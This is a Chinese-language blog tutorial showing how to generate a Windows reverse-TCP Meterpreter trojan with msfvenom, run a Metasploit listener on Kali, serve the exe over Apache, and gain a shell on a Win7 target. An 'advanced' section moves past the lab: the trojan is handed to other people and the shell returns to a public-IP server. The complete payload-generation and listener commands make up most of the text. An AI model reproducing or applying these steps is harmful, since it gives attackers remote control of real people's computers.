Msfvenom是Metasploit独立的有效载荷生成器,也是msf有效载荷和msphencode的替代品。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode,常用于生成木马,在目标机器上执行,在本地机器kali中上线
实验目的
用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,实现控制靶机win7
实验环境
- 攻击机:kali linux(192.168.72.133)
- 靶机:win7 x64(192.168.72.136)
- 工具:Metasploit和msfvenom
- 环境:同一局域网
查看所有--payload的模块
msfvenom -l payloads
首先使用msfvenom生成一个可以被windows执行的exe木马文件,免杀就不做了,现在安装直接秒杀,已经没什么用了
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.133 LPORT=5555 -f exe > qyyx.exe
192.168.72.133
是kali的IP地址5555
是选择kali监听的端口qyyx.exe
是生成exe文件

# 启动metasploit渗透框架
msfconsole
# 使用侦听模块
use exploit/multi/handler
# 加载payload攻击模块
set payload windows/meterpreter/reverse_tcp
# 设置kali的ip
set LHOST 192.168.72.133
# 设置kali的端口
set LPORT 5555

# 查看参数设置
show options
# 开始监听
run

接下来就可以把qyyx.exe木马文件发送给win7了
只要win7安装并且运行,shell就会反弹到kali中
怎么将kali生成的exe拿出来?有三个方法
- 第一个方法是启动kali的apache
systemctl start apache2
把exe文件放到/var/www/html/目录下,在win7中访问kali的ip加文件名字
192.168.72.133/qyyx.exe就可以下载了 - 第二个方法是复制粘贴,前提是有vmware tools
- 第二个方法是打开kali自带的火狐浏览器上传到网盘中
双击运行后,打开cmd输入netstat –na
可以看到一个外部连接


如果kali出现meterpreter > 就证明shell反弹成功,然后我们就可以在kali执行shell指令了(得到了管理员权限)


进阶玩法
我们把木马给其他人运行时发现kali这边没反应
因为生成木马用的是内网地址,不在同一网段,shell没法反弹
所以我们可以选择一个有公网IP的机器,让shell反弹给攻击机
有公网ip的机器可以是内网穿透节点,也可以是攻击机
之前写过内网穿透的教程了,现在就用服务器当攻击机演示
在centos7下安装Metasploit
yum install wget -y
wget https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-6.1.37%2B20220402102547~1rapid7-1.el6.x86_64.rpm
rpm -i metasploit-framework-6.1.37+20220402102547~1rapid7-1.el6.x86_64.rpm
安装之后,就从上面生成木马开始执行代码一路执行,不同的是监听ip,要换成服务器的公网ip
关于进阶玩法详细内容,请看Linux下安装nginx:https://blog.aerr.cn/1888.html

Comments NOTHING